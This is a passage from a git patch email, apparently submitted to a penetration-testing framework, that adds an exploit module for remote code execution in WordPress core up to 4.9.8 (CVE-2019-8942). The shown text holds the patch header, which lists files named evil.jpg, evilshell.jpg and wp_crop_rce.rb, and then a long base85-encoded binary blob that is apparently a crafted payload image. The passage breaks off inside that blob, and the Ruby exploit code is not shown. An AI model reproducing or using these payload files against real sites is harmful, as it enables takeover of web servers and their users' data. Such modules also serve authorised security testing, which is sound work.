From 23a86e7ad2e6178cc7dbe6cef49a9f454d7d11bf Mon Sep 17 00:00:00 2001
From: wilfried
Date: Tue, 19 Mar 2019 16:03:29 +0100
Subject: [PATCH 01/16] Add exploit module for Wordpress core <=4.9.8 (CVE-2019-8942)
---
data/exploits/CVE-2019-8942/evil.jpg | Bin 0 -> 28541 bytes
data/exploits/CVE-2019-8942/evilshell.jpg | Bin 0 -> 11820 bytes
modules/exploits/unix/webapp/wp_crop_rce.rb | 396 ++++++++++++++++++++
3 files changed, 396 insertions(+)
create mode 100644 data/exploits/CVE-2019-8942/evil.jpg
create mode 100644 data/exploits/CVE-2019-8942/evilshell.jpg
create mode 100644 modules/exploits/unix/webapp/wp_crop_rce.rb
diff --git a/data/exploits/CVE-2019-8942/evil.jpg b/data/exploits/CVE-2019-8942/evil.jpg new file mode 100644 index 0000000000000000000000000000000000000000..ecafd2ffed9b731f628337d48678c5979c5ec923 GIT binary patch literal 28541 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 